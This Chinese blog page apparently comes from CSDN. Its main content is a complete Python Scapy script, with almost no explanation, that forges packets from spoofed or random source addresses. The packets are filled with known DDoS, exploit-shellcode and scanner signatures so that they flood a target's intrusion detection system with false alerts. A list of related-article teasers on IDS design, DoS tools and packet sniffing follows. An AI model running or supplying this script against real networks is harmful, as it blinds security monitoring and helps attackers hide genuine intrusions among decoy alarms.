使用Scapy愚弄入侵检测系统

最新推荐文章于 2024-04-03 17:56:02 发布
最新推荐文章于 2024-04-03 17:56:02 发布
阅读量637 收藏 1
点赞数 
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
from random import randint

# 触发DDoS警报
def ddosTest(src, dst, iface, count):
    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
    send(pkt, iface=iface, count=count)

    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
    send(pkt, iface=iface, count=count)

    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
    send(pkt, iface=iface, count=count)

    pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
    send(pkt, iface=iface, count=count)

# 触发exploits警报
def exploitTest(src, dst, iface, count):
    pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
    send(pkt, iface=iface, count=count)

    pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
    send(pkt, iface=iface, count=count)

# 触发踩点扫描警报
def scanTest(src, dst, iface, count):
    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
    send(pkt)

    pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
    send(pkt, iface=iface, count=count)

def main():
    parser = optparse.OptionParser('[*]Usage: python idsFoil.py -i <iface> -s <src> -t <target> -c <count>')
    parser.add_option('-i', dest='iface', type='string', help='specify network interface')
    parser.add_option('-s', dest='src', type='string', help='specify source address')
    parser.add_option('-t', dest='tgt', type='string', help='specify target address')
    parser.add_option('-c', dest='count', type='int', help='specify packet count')
    (options, args) = parser.parse_args()
    if options.iface == None:
        iface = 'eth0'
    else:
        iface = options.iface
    if options.src == None:
        src = '.'.join([str(randint(1,254)) for x in range(4)])
    else:
        src = options.src
    if options.tgt == None:
        print parser.usage
        exit(0)
    else:
        dst = options.tgt
    if options.count == None:
        count = 1
    else:
        count = options.count

    ddosTest(src, dst, iface, count)
    exploitTest(src, dst, iface, count)
    scanTest(src, dst, iface, count)

if __name__ == '__main__':
    main()

zwlww1
关注
入侵检测系统
肥晨开发的学习之路
07-04 1099
本文介绍了基于Python的入侵检测系统的设计与实现。首先,简要概述了入侵检测系统的背景、国内外的现状与趋势。然后,详细介绍了系统的核心内容和相关的技术与方法。接着,对系统进行了全面的分析、设计和实现。最后,对系统进行了充分的测试,并对本文进行了总结和展望。在未来的工作中,我们将致力于进一步完善系统的功能和性能。例如,可以引入更多的特征提取方法和算法模型以提高入侵检测的准确性和效率。同时,也需要针对大规模数据集进行更广泛的测试和应用,以验证系统的可扩展性和稳定性。
基于深度学习的入侵检测系统设计与实现
最新发布
程序员光剑
08-06 1239
基于深度学习的入侵检测系统在提高检测精度和效率方面展现出了巨大的潜力,然而,它仍然面临着一些挑战,例如数据标准化、模型解释性、攻击的多样性等。未来,我们需要在这些方面进行更深入的研究,并开发出更强大的入侵检测系统
遗传算法实现入侵检测,AISpython实现
04-27
利用python实现遗传算法对正常流量和恶意流量进行区分,类似于AIS,IDS
python ddos 检测系统_python实现端口扫描器/DoS/DDoS
weixin_39966130的博客
12-06 625
整理github,梳理下Python小工具。以下是python实现的DoS/DDoS/端口扫描器(github)。一、DoSSYN Flood是当前最流行的DoS(拒绝服务攻击)与DdoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。参考链接:https://baike.so.com/doc...
网络安全之入侵检测系统
2201_75362610的博客
04-03 1475
入侵:指一系列试图破坏信息资源机密性完整性和可用性的行为。对信息系统的非授权访问及(或)未经许可在信息系统中进行操作。入侵检测:是通过从计算机网络系统中的若干关键节点收集信息,并分析这些信息,监控网络中是否有违反安全策略的行为或者是否存在入侵行为,是对指向计算和网络资源的恶意行为的识别和响应过程。入侵检测系统(IDS):入侵检测系统通过监视受保护系统的状态和活动,采用异常检测或滥用检测的方式,发现非授权的或恶意的系统及网络行为,为防范入侵行为提供有效的手段,是一个完备的网络安全体系的重要组成部分。
入侵检测系统详解(IDS)
热门推荐
whoim_i的博客
11-26 3万+
目录入侵检测系统(IDS)概念入侵检测系统的分类根据数据源分类1 基于主机的入侵检测系统2 基于网络的入侵检测系统根据检测原理分类1 异常入侵检测。2 误用入侵检测。根据体系结构分类1.集中式2.等级式3.协作式根据工作方式分类1 离线检测。2 在线监测。入侵检测功能1 监控、分析用户和系统的活动2 发现入侵企图或异常现象3 记录、报警和响应 入侵检测系统(IDS)概念 入侵检测系统(intrus...
python入侵检测系统
02-20
Python入侵检测系统是一种基于Python编程语言构建的网络安全工具,用于监测和分析网络流量以及系统活动,以识别潜在的恶意行为或安全威胁。Python因其丰富的库支持、强大的数据处理能力和易于学习的特点,成为开发...
基于python实现的TCP入侵检测系统+检测端口扫描+Dos攻击联动iptables进行防御+源码(毕设&课程设计&项目开发)
06-25
基于python实现的TCP入侵检测系统+检测端口扫描+Dos攻击联动iptables进行防御+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python实现的TCP入侵检测...
python使用scapy修改替换pcap的payload
01-21
python使用scapy修改替换pcap的payload 例如替换http get请求的内容,替换tcp负载内容
Python Scapy 愚弄入侵检测系统
CSDN
10-06 7506
愚弄入侵检测系统的概念是通过制造假的攻击迹象来触发入侵检测系统(IDS)的警报,从而干扰其正常运行并引发误报。这可以使目标系统产生大量警报,使操作员难以对真正的攻击行为做出准确的判断,从而降低其有效性。利用Scapy可以构造具有欺骗性的数据包,模拟各种攻击行为,以触发IDS的警报。再比如,当含有指定字节序列就会触发警报,为了生成含有该指定字节序列的数据包,可以使用符号\x,后面跟上该字节的十六进制值。接着伪造并触发踩点扫描警报,只要我们数据包中含有特定的特征码即可触发警报,我们构造一下。
Snort+scapy(一)
hxm的博客
03-20 2132
Snort+scapy
pytbull - 入侵检测/预防系统(IDS / IPS)测试框架
liqiuman180688的博客
12-26 2829
黑白之道 pytbull是Snort,Suricata和任何生成警报文件的IDS / IPS的入侵检测/预防系统(IDS / IPS)测试框架。它可用于测试IDS / IPS的检测和阻止功能,比较IDS / IPS,比较配置修改和检查/验证配置。 该框架随附了大约300个测试,分为11个测试模块: badTraffic:不符合RFC的数据包被发送到服务器以测试数据包的处理方式。 bruteFor...
浅析几个著名的入侵检测系统
stilling2006的专栏
09-18 2648
入侵检测系统是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于,入侵检测系统是一种积极主动的安全防护技术。 入侵检测系统(IDS)检查所有进入和发出的网络活动,并可确认某种可疑模式,IDS利用这种模式能够指明来自试图进入(或破坏系统)的某人的网络攻击(或系统攻击)。入侵检测系统与防火墙不同,主要在于防火墙关注入侵是为
一次完整的入侵检测
zacklin的专栏
03-28 4463
目标:取得管理员权限,在网站中留一个网页,收集漏洞情况。     计划:第一天进行踩点,第二天测试进攻,第三天看看网站的论坛……最终取得管理员权限。     1. 好久没有入侵了,很多都不会了,不过步骤还是要的。首先进行踩点(我踩踩踩!!),当然不是盲目的去扫描,先ping了一下他的网站。     Ping www.inday.com     Pinging www.inday.c
Scapy嗅探TCP数据包
zwlww1的博客
01-23 2510
#!/usr/bin/python #coding=utf-8 import re import optparse from scapy.all import * def findCreditCard(pkt): raw = pkt.sprintf('%Raw.load%') # American Express信用卡由34或37开头的15位数字组成 americaRE = re.find
Java入侵检测系统(一)
我们为什么能在这里遇到?
04-27 3103
这学期上了入侵检测实验,因为一开始就打算做这个包分析系统,结果拖延症再发,现在开始一边学php一边做入侵检测(为了保证进度,我会不定期更新文章督促自己)。Jpcap抓包类,看到一篇论文,讲的比较好运行测试demo,能够成功运行我做的这个程序主要是仿snort这个入侵检测系统,这学期开始,我在老师的帮助下看了一些资料,主要是包含了学长用C#做的毕业设计以及两本书《Snort2.0 入侵检测》以及《Sn
Scapy嗅探报错
buside的博客
03-15 4767
根据官网嗅探示例,在使用指令 sniff(iface="eth1", prn=lambda x: x.show()) 时报如下错误 Traceback (most recent call last): File "D:\Python37\lib\site-packages\scapy\arch\windows\__init__.py", line 891, in dev_from_n...
使用Scapy构建网络工具:官方教程速览
在开始使用Scapy之前,需要下载并安装。一般来说,分为Scapy v2.x和v1.2两个版本的安装方法。对于Scapy v2.x,通常可以通过Python包管理器pip进行安装。而v1.2版本可能需要手动下载源码并编译。此外,为了实现某些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值